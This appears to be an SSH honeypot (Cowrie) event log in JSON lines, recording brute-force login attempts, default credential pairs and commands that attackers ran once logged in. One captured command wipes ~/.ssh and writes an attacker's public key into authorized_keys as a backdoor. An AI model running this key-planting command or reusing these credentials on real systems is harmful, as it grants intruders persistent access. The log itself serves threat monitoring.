{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:02.246862Z","src_ip":"212.227.125.160","session":"df1a05c4dabf"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:03.138735Z","src_ip":"212.227.125.160","session":"df1a05c4dabf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:04.363672Z","src_ip":"212.227.125.160","session":"df1a05c4dabf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46408,"dst_ip":"1.2.3.4","dst_port":22,"session":"80715b0386d8","protocol":"ssh","message":"New connection: 212.227.235.229:46408 (1.2.3.4:22) [session: 80715b0386d8]","sensor":"my-vps","timestamp":"2025-08-28T06:56:08.584085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:08.667190Z","src_ip":"212.227.235.229","session":"80715b0386d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:08.915439Z","src_ip":"212.227.235.229","session":"80715b0386d8"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:09.662230Z","src_ip":"212.227.235.229","session":"80715b0386d8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:10.913254Z","src_ip":"212.227.235.229","session":"80715b0386d8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51088,"dst_ip":"1.2.3.4","dst_port":22,"session":"307a895a8aaa","protocol":"ssh","message":"New connection: 217.72.205.35:51088 (1.2.3.4:22) [session: 307a895a8aaa]","sensor":"my-vps","timestamp":"2025-08-28T06:56:13.373124Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:13.374213Z","src_ip":"217.72.205.35","session":"307a895a8aaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54594,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98a6c21268f","protocol":"ssh","message":"New connection: 212.227.125.160:54594 (1.2.3.4:22) [session: d98a6c21268f]","sensor":"my-vps","timestamp":"2025-08-28T06:56:18.468868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:18.469512Z","src_ip":"212.227.125.160","session":"d98a6c21268f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:18.688315Z","src_ip":"212.227.125.160","session":"d98a6c21268f"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:19.346724Z","src_ip":"212.227.125.160","session":"d98a6c21268f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50116,"dst_ip":"1.2.3.4","dst_port":22,"session":"26aba584f736","protocol":"ssh","message":"New connection: 212.227.235.229:50116 (1.2.3.4:22) [session: 26aba584f736]","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.316566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.317408Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.403690Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.566996Z","src_ip":"212.227.125.160","session":"d98a6c21268f"}
{"eventid":"cowrie.login.success","username":"root","password":"smoothwall","message":"login attempt [root/smoothwall] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.783749Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:56:20.974056Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.974886Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:56:20.975998Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.062873Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:56:21.350502Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.351282Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.437412Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.438440Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50132,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ef27c2ce7e","protocol":"ssh","message":"New connection: 212.227.235.229:50132 (1.2.3.4:22) [session: c8ef27c2ce7e]","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.518031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.518688Z","src_ip":"212.227.235.229","session":"c8ef27c2ce7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.601088Z","src_ip":"212.227.235.229","session":"c8ef27c2ce7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:21.971183Z","src_ip":"212.227.235.229","session":"c8ef27c2ce7e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.063916Z","src_ip":"212.227.235.229","session":"c8ef27c2ce7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50148,"dst_ip":"1.2.3.4","dst_port":22,"session":"89514bd8bca9","protocol":"ssh","message":"New connection: 212.227.235.229:50148 (1.2.3.4:22) [session: 89514bd8bca9]","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.146620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.147521Z","src_ip":"212.227.235.229","session":"89514bd8bca9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.231543Z","src_ip":"212.227.235.229","session":"89514bd8bca9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.606226Z","src_ip":"212.227.235.229","session":"89514bd8bca9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.690994Z","src_ip":"212.227.235.229","session":"26aba584f736"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:23.691788Z","src_ip":"212.227.235.229","session":"89514bd8bca9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50304,"dst_ip":"1.2.3.4","dst_port":22,"session":"32a6b095e099","protocol":"ssh","message":"New connection: 212.227.235.229:50304 (1.2.3.4:22) [session: 32a6b095e099]","sensor":"my-vps","timestamp":"2025-08-28T06:56:25.078700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:25.079410Z","src_ip":"212.227.235.229","session":"32a6b095e099"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:25.329404Z","src_ip":"212.227.235.229","session":"32a6b095e099"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:26.081038Z","src_ip":"212.227.235.229","session":"32a6b095e099"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:27.334718Z","src_ip":"212.227.235.229","session":"32a6b095e099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33196,"dst_ip":"1.2.3.4","dst_port":22,"session":"a962face8113","protocol":"ssh","message":"New connection: 212.227.125.160:33196 (1.2.3.4:22) [session: a962face8113]","sensor":"my-vps","timestamp":"2025-08-28T06:56:34.846632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:34.849270Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:35.062864Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:56:35.924012Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:56:36.376539Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:56:36.377327Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:36.624080Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:36.625337Z","src_ip":"212.227.125.160","session":"a962face8113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46518,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ac6cb09d808","protocol":"ssh","message":"New connection: 212.227.235.229:46518 (1.2.3.4:22) [session: 2ac6cb09d808]","sensor":"my-vps","timestamp":"2025-08-28T06:56:36.987806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:36.988456Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
